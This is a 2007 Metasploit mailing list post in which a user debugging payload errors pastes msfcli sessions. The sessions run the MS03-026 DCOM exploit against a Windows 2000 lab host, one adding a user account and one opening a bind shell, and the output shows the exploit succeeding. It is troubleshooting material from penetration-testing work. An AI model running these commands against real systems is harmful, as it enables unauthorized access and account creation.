Metasploit mailing list archives
Re: windows/exec Payload problems.
From: a10n3.s7r1k3r at gmail.com (Kashif Iftikhar)
Date: Wed, 24 Jan 2007 13:49:20 +0000
Here is some additional info. I get the same error when I use the payload windows/adduser but the user gets added even after getting the error. Also, if I terminate the windows session by typing "exit" in windows shell, I seem to be able to exploit the same box again in MSF3. So the repeated exploiting problem is resolved but the payload issue still remains. Here is the sample output. *********************************************************************************** root at S7R1K3R:/pentest/exploits/framework-3.0-beta-3$ ./msfcli "exploit/windows/dcerpc/ms03_026_dcom" PAYLOAD="windows/adduser" RHOST="192.168.0.17" USER="kkj1" PASS="kkj1" E [*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal... [*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0 at ncacn_ip_tcp:192.168.0.17[135] ... [*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0 at ncacn_ip_tcp:192.168.0.17[135] ... [*] Sending exploit ... Exploit failed: end of file reached Backtrace: ./lib/rex/io/stream.rb:58:in `sysread' ./lib/rex/io/stream.rb:58:in `read' ./lib/rex/io/stream.rb:181:in `get_once' ./lib/rex/proto/dcerpc/client.rb:150:in `read' ./lib/rex/proto/dcerpc/client.rb:230:in `call' ./lib/msf/core/exploit/dcerpc.rb:97:in `dcerpc_call' /pentest/exploits/framework-3.0-beta-3/modules/exploits/windows/dcerpc/ms03_026_dcom.rb:206:in `exploit' ./lib/msf/core/exploit_driver.rb:189:in `job_run_proc' ./lib/msf/core/exploit_driver.rb:152:in `run' ./lib/msf/base/simple/exploit.rb:118:in `exploit_simple' ./lib/msf/base/simple/exploit.rb:127:in `exploit_simple' ./msfcli:153 root at S7R1K3R:/pentest/exploits/framework-3.0-beta-3$ ./msfcli "exploit/windows/dcerpc/ms03_026_dcom" PAYLOAD="windows/shell/bind_tcp" RHOST="192.168.0.17" E [*] Started bind handler [*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal... [*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0 at ncacn_ip_tcp:192.168.0.17[135] ... [*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0 at ncacn_ip_tcp:192.168.0.17[135] ... [*] Sending exploit ... [*] Sending stage (474 bytes) [*] The DCERPC service did not reply to our request [*] Command shell session 1 opened (192.168.0.21:41500 -> 192.168.0.17:4444) Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-1999 Microsoft Corp. C:\WINNT\system32>net user net user User accounts for \\ ------------------------------------------------------------------------------- Administrator Guest IUSR_COMPULIFE IWAM_COMPULIFE kkj kkj1 The command completed with one or more errors. C:\WINNT\system32>exit exit Abort session 1? [y/N] y ********************************************************************************
Current thread:
- Re: windows/exec Payload problems. Kashif Iftikhar (Jan 24)
- Re: windows/exec Payload problems. Kashif Iftikhar (Jan 24)
- Re: windows/exec Payload problems. Kashif Iftikhar (Jan 24)
- Re: windows/exec Payload problems. Kashif Iftikhar (Jan 24)